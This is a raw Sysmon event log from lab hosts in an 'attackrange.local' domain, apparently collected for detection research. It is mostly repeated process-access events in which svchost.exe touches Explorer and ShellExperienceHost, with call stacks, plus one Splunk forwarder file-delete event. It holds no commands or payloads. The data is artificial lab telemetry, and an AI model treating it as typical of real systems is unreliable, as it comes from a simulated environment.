10341000x80000000000000001054507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:22.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C690666B89A7BCA85A6142B11D11072,SHA256=F1000939755D60A07B2AD0CACACBD3345F63BD9D0177CC690C970256786F234D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 